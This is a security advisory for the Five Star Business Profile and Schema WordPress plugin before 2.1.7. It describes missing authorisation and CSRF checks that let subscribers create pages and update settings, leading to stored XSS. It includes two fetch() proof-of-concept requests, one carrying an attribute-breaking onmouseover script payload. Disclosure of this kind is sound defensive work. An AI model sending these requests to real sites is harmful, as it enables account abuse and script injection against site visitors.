Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:9E1AC711-1F65-49FA-B007-66170A77B265
HistoryJan 18, 2022 - 12:00 a.m.

Five Star Business Profile and Schema < 2.1.7 - Subscriber+ Page Creation & Settings Update to Stored XSS

2022-01-1800:00:00
Krzysztof Zając
wpscan.com
10

0.001 Low

EPSS

Percentile

24.8%

The plugin does not have any authorisation and CSRF in its bpfwp_welcome_add_contact_page and bpfwp_welcome_set_contact_information AJAX action, allowing any authenticated users, such as subscribers, to call them. Furthermore, due to the lack of sanitisation, it also lead to Stored Cross-Site Scripting issues

PoC

Page creation: fetch(“https://127.0.0.1:8001/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “bpfwp_welcome_add_contact_page”, “contact_page_title”: “hey there!”}), “method”: “POST”, “credentials”: “include” }); Settings upgrade: fetch(“https://127.0.0.1:8001/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “bpfwp_welcome_set_contact_information”, “phone”: ‘" style=left:0;top:0;right:0;bottom:0;position:fixed onmouseover=alert(1) x=’}), “method”: “POST”, “credentials”: “include” });

CPENameOperatorVersion
business-profilelt2.1.7

0.001 Low

EPSS

Percentile

24.8%

Related for WPVDB-ID:9E1AC711-1F65-49FA-B007-66170A77B265